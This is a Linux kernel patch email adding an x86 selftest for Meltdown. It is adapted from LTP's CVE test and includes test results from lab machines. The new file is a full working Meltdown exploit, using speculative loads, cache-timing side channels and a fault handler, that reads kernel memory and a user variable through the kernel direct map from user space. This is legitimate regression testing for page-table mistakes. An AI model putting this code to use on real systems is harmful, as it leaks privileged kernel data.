[PATCH] selftest/x86/meltdown: Add a selftest for meltdown

From: Aaron Lu
Date: Thu Jan 05 2023 - 07:35:52 EST


To capture potential programming errors like mistakenly setting Global
bit on kernel page table entries, a selftest for meltdown is added.

This selftest is based on Pavel Boldin's work at:
https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c

In addition to the existing test of reading kernel variable
saved_command_line from user space, one more test of reading user local
variable through kernel direct map address is added. For the existing
test(reading saved_command_line) to report a failure, both the high kernel
mapping and low kernel mapping have to be in leaked state; For the added
test(read local var), only low kernel mapping leak is enough to trigger
a test fail, so both tests are useful.

Test results of 10 runs:

On v6.1-rc8 with nopti kernel cmdline option:

host test_out_rate_1 test_out_rate_2
lkp-bdw-de1 50% 100%
lkp-hsw-d01 70% 100%
lkp-hsw-d02 0% 80%
lkp-hsw-d03 60% 100%
lkp-hsw-d04 20% 100%
lkp-hsw-d05 60% 100%
lkp-ivb-d01 0% 70%
lkp-kbl-d01 100% 100%
lkp-skl-d02 100% 90%
lkp-skl-d03 90% 100%
lkp-skl-d05 60% 100%
kbl-vm 100% 80%
2 other machines have 0% rate for both tests.

bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.

test_out_rate_1: test reports fail rate for the test of reading
saved_command_line from user space;
test_out_rate_2: test reports fail rate for the test of reading user
local variable through kernel direct map address in user space.

On v5.19 without nopti cmdline option:
host test_out_rate_2
lkp-bdw-de1 80%
lkp-hsw-4ex1 50%
lkp-hsw-d01 30%
lkp-hsw-d03 10%
lkp-hsw-d04 10%
lkp-kbl-d01 10%
kbl-vm 80%
7 other machines have 0% rate for test2.

Also tested on an i386 VM with 512M memory and the test out rate is 100%
when adding nopti to kernel cmdline with v6.1-rc8.

Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library
functions;
- Coding style changes: placing the function return type in the same
line of the function.

Signed-off-by: Aaron Lu <aaron.lu@xxxxxxxxx>
---
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.

tools/testing/selftests/x86/Makefile | 2 +-
tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++
2 files changed, 530 insertions(+), 1 deletion(-)
create mode 100644 tools/testing/selftests/x86/meltdown.c

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
check_initial_reg_state sigreturn iopl ioperm \
test_vsyscall mov_ss_trap \
- syscall_arg_fault fsgsbase_restore sigaltstack
+ syscall_arg_fault fsgsbase_restore sigaltstack meltdown
TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
test_FCMOV test_FCOMI test_FISTTP \
vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..fcb211dc9038
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,529 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2018 Pavel Boldin <pboldin@xxxxxxxxxxxxxx>
+ * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdarg.h>
+#include <string.h>
+#include <signal.h>
+#include <ucontext.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/utsname.h>
+#include <sys/mman.h>
+
+#define PAGE_SHIFT 12
+#define PAGE_SIZE 0x1000
+#define PUD_SHIFT 30
+#define PUD_SIZE (1UL << PUD_SHIFT)
+#define PUD_MASK (~(PUD_SIZE - 1))
+
+size_t cache_miss_threshold;
+unsigned long directmap_base;
+
+#define TARGET_OFFSET 9
+#define TARGET_SIZE (1 << TARGET_OFFSET)
+#define BITS_BY_READ 2
+
+static inline uint64_t rdtsc(void)
+{
+ uint32_t eax, edx;
+ uint64_t tsc_val;
+ /*
+ * The lfence is to wait (on Intel CPUs) until all previous
+ * instructions have been executed. If software requires RDTSC to be
+ * executed prior to execution of any subsequent instruction, it can
+ * execute LFENCE immediately after RDTSC
+ * */
+ __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx));
+ tsc_val = ((uint64_t)edx) << 32 | eax;
+ return tsc_val;
+}
+
+static inline void clflush(volatile void *__p)
+{
+ asm volatile("clflush %0" : "+m" (*(volatile char *)__p));
+}
+
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+
+static void clflush_target(void)
+{
+ int i;
+
+ for (i = 0; i < BITS_BY_READ; i++)
+ clflush(&target_array[i * TARGET_SIZE]);
+}
+
+extern char failshere[];
+extern char stopspeculate[];
+
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit)
+{
+ register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
+ asm volatile (
+ "1:\n\t"
+
+ ".rept 300\n\t"
+ "add $0x141, %%rax\n\t"
+ ".endr\n"
+
+ "failshere:\n\t"
+ "movb (%[addr]), %%al\n\t"
+ "ror %[bit], %%rax\n\t"
+ "and $1, %%rax\n\t"
+ "shl $9, %%rax\n\t"
+ "jz 1b\n\t"
+
+ "movq (%[target], %%rax, 1), %%rbx\n"
+
+ "stopspeculate: \n\t"
+ "nop\n\t"
+ :
+ : [target] "r" (target_array),
+ [addr] "r" (addr),
+ [bit] "r" (mybit)
+ : "rax", "rbx"
+ );
+#else /* defined(__x86_64__) */
+ asm volatile (
+ "1:\n\t"
+
+ ".rept 300\n\t"
+ "add $0x141, %%eax\n\t"
+ ".endr\n"
+
+ "failshere:\n\t"
+ "movb (%[addr]), %%al\n\t"
+ "ror %[bit], %%eax\n\t"
+ "and $1, %%eax\n\t"
+ "shl $9, %%eax\n\t"
+ "jz 1b\n\t"
+
+ "movl (%[target], %%eax, 1), %%ebx\n"
+
+ "stopspeculate: \n\t"
+ "nop\n\t"
+ :
+ : [target] "r" (target_array),
+ [addr] "r" (addr),
+ [bit] "r" (mybit)
+ : "rax", "ebx"
+ );
+#endif
+}
+
+#ifdef __i386__
+# define REG_RIP REG_EIP
+#endif
+
+static void sigsegv(int sig, siginfo_t *siginfo, void *context)
+{
+ ucontext_t *ucontext = context;
+ unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP];
+ if (*prip != (unsigned long)failshere) {
+ printf("Segmentation fault at unexpected location %lx\n", *prip);
+ abort();
+ }
+ *prip = (unsigned long)stopspeculate;
+ return;
+}
+
+static int set_signal(void)
+{
+ struct sigaction act = {
+ .sa_sigaction = sigsegv,
+ .sa_flags = SA_SIGINFO,
+ };
+
+ return sigaction(SIGSEGV, &act, NULL);
+}
+
+static inline int get_access_time(volatile char *addr)
+{
+ unsigned long long time1, time2;
+ volatile int j __attribute__((__unused__));
+
+ time1 = rdtsc();
+ j = *addr;
+ time2 = rdtsc();
+
+ return time2 - time1;
+}
+
+static int cache_hit_threshold;
+static int hist[BITS_BY_READ];
+
+static void check(void)
+{
+ int i, time;
+ volatile char *addr;
+
+ for (i = 0; i < BITS_BY_READ; i++) {
+ addr = &target_array[i * TARGET_SIZE];
+
+ time = get_access_time(addr);
+
+ if (time <= cache_hit_threshold)
+ hist[i]++;
+ }
+}
+
+#define CYCLES 10000
+static int readbit(int fd, unsigned long addr, char bit)
+{
+ int i, ret;
+ static char buf[256];
+
+ memset(hist, 0, sizeof(hist));
+
+ for (i = 0; i < CYCLES; i++) {
+ /*
+ * Make the to-be-stolen data cache and tlb hot
+ * to increase success rate.
+ */
+ ret = pread(fd, buf, sizeof(buf), 0);
+ if (ret < 0)
+ printf("[INFO]\tCan't read fd");
+
+ clflush_target();
+
+ speculate(addr, bit);
+ check();
+ }
+
+ if (hist[1] > CYCLES / 10)
+ return 1;
+ return 0;
+}
+
+static int readbyte(int fd, unsigned long addr)
+{
+ int bit, res = 0;
+
+ for (bit = 0; bit < 8; bit ++ )
+ res |= (readbit(fd, addr, bit) << bit);
+
+ return res;
+}
+
+static int mysqrt(long val)
+{
+ int root = val / 2, prevroot = 0, i = 0;
+
+ while (prevroot != root && i++ < 100) {
+ prevroot = root;
+ root = (val / root + root) / 2;
+ }
+
+ return root;
+}
+
+#define ESTIMATE_CYCLES 1000000
+static void set_cache_hit_threshold(void)
+{
+ long cached, uncached, i;
+
+ for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+ cached += get_access_time(target_array);
+
+ for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+ cached += get_access_time(target_array);
+
+ for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
+ clflush(target_array);
+ uncached += get_access_time(target_array);
+ }
+
+ cached /= ESTIMATE_CYCLES;
+ uncached /= ESTIMATE_CYCLES;
+
+ cache_hit_threshold = mysqrt(cached * uncached);
+
+ printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n",
+ cached, uncached, cache_hit_threshold);
+}
+
+static unsigned long find_symbol_in_file(const char *filename, const char *symname)
+{
+ unsigned long addr;
+ char type, *buf;
+ int found;
+ FILE *fp;
+
+ fp = fopen(filename, "r");
+ if (!fp) {
+ printf("[INFO]\tFailed to open %s\n", filename);
+ return 0;
+ }
+
+ buf = malloc(4096);
+ if (!buf)
+ return 0;
+
+ found = 0;
+ while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) {
+ if (!strcmp(buf, symname)) {
+ found = 1;
+ break;
+ }
+ }
+
+ free(buf);
+ fclose(fp);
+
+ return found ? addr : 0;
+}
+
+static unsigned long find_kernel_symbol(const char *name)
+{
+ char systemmap[256];
+ struct utsname utsname;
+ unsigned long addr;
+
+ addr = find_symbol_in_file("/proc/kallsyms", name);
+ if (addr)
+ return addr;
+
+ if (uname(&utsname) < 0)
+ return 0;
+ sprintf(systemmap, "/boot/System.map-%s", utsname.release);
+ addr = find_symbol_in_file(systemmap, name);
+ return addr;
+}
+
+static unsigned long saved_cmdline_addr;
+static int spec_fd;
+
+#define READ_SIZE 32
+
+static int test_read_saved_command_line(void)
+{
+ unsigned int i, score = 0, ret;
+ unsigned long addr;
+ unsigned long size;
+ char read[READ_SIZE] = { 0 };
+ char expected[READ_SIZE] = { 0 };
+ int expected_len;
+
+ saved_cmdline_addr = find_kernel_symbol("saved_command_line");
+ if (!saved_cmdline_addr) {
+ printf("[SKIP]\tCan not find symbol saved_command_line\n");
+ return 0;
+ }
+ printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr);
+
+ spec_fd = open("/proc/cmdline", O_RDONLY);
+ if (spec_fd == -1) {
+ printf("[SKIP]\tCan not open /proc/cmdline\n");
+ return 0;
+ }
+
+ expected_len = pread(spec_fd, expected, sizeof(expected), 0);
+ if (expected_len < 0) {
+ printf("[SKIP]\tCan't read /proc/cmdline\n");
+ return 0;
+ }
+
+ /* read address of saved_cmdline_addr */
+ addr = saved_cmdline_addr;
+ size = sizeof(addr);
+ for (i = 0; i < size; i++) {
+ ret = readbyte(spec_fd, addr);
+ read[i] = ret;
+ addr++;
+ }
+
+ /* read value pointed to by saved_cmdline_addr */
+ memcpy(&addr, read, sizeof(addr));
+ memset(read, 0, sizeof(read));
+ printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
+ size = expected_len;
+
+ if (!addr)
+ goto done;
+
+ for (i = 0; i < size; i++) {
+ ret = readbyte(spec_fd, addr);
+ read[i] = ret;
+ addr++;
+ }
+
+ for (i = 0; i < size; i++)
+ if (expected[i] == read[i])
+ score++;
+
+done:
+ if (score > size / 2) {
+ printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n");
+ ret = -1;
+ } else {
+ printf("[OK]\ttest_read_saved_command_line: no leak found.\n");
+ ret = 0;
+ }
+
+ close(spec_fd);
+
+ return ret;
+}
+
+static int get_directmap_base(void)
+{
+ char *buf;
+ FILE *fp;
+ size_t n;
+ int ret;
+
+ fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+ if (!fp)
+ return -1;
+
+ buf = NULL;
+ ret = -1;
+ while (getline(&buf, &n, fp) != -1) {
+ if (!strstr(buf, "Kernel Mapping"))
+ continue;
+
+ if (getline(&buf, &n, fp) != -1 &&
+ sscanf(buf, "0x%lx", &directmap_base) == 1) {
+ printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+ directmap_base &= PUD_MASK;
+ ret = 0;
+ break;
+ }
+ }
+
+ fclose(fp);
+ free(buf);
+ return ret;
+}
+
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+ unsigned long pfn;
+ uint64_t val;
+ int fd, ret;
+
+ fd = open("/proc/self/pagemap", O_RDONLY);
+ if (fd == -1) {
+ printf("[INFO]\tFailed to open pagemap\n");
+ return -1;
+ }
+
+ ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+ if (ret == -1) {
+ printf("[INFO]\tFailed to read pagemap\n");
+ goto out;
+ }
+
+ if (!(val & (1ULL << 63))) {
+ printf("[INFO]\tPage not present according to pagemap\n");
+ ret = -1;
+ goto out;
+ }
+
+ pfn = val & ((1ULL << 55) - 1);
+ if (pfn == 0) {
+ printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+ ret = -1;
+ goto out;
+ }
+
+ ret = 0;
+ *phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+
+out:
+ close(fd);
+ return ret;
+}
+
+static int test_read_local_var(void)
+{
+ char path[] = "/tmp/meltdown.XXXXXX";
+ char string[] = "test string";
+ unsigned long phys;
+ int i, len, ret;
+ char *result;
+ void *p;
+
+ if (get_directmap_base() == -1) {
+ printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n");
+ return 0;
+ }
+
+ spec_fd = mkstemp(path);
+ if (spec_fd == -1) {
+ printf("[SKIP]\tCan not open %s\n", path);
+ return 0;
+ }
+ ftruncate(spec_fd, 0x1000);
+
+ p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0);
+ if (p == MAP_FAILED) {
+ printf("[SKIP]\tmmap spec_fd failed\n");
+ return 0;
+ }
+ memcpy(p, string, sizeof(string));
+
+ if (virt_to_phys((unsigned long)p, &phys) == -1) {
+ printf("[SKIP]\tCan not convert virtual address to physical address\n");
+ return 0;
+ }
+
+ len = strlen(string);
+ result = malloc(len + 1);
+ if (!result) {
+ printf("[SKIP]\tNot enough memory for malloc\n");
+ return 0;
+ }
+ memset(result, 0, len + 1);
+
+ for (i = 0; i < len; i++, phys++) {
+ result[i] = readbyte(spec_fd, directmap_base + phys);
+ if (result[i] == 0)
+ break;
+ }
+
+ ret = !strncmp(string, result, len);
+ if (ret)
+ printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n");
+ else
+ printf("[OK]\ttest_read_local_var: no leak found.\n");
+
+ free(result);
+ munmap(p, 0x1000);
+ close(spec_fd);
+
+ return ret;
+}
+
+int main(void)
+{
+ int ret1, ret2;
+
+ printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+ set_cache_hit_threshold();
+
+ memset(target_array, 1, sizeof(target_array));
+
+ if (set_signal() < 0) {
+ printf("[SKIP]\tCan not set handler for segfault\n");
+ return 0;
+ }
+
+ ret1 = test_read_local_var();
+ ret2 = test_read_saved_command_line();
+
+ if (ret1 || ret2)
+ return -1;
+
+ return 0;
+}
--
2.39.0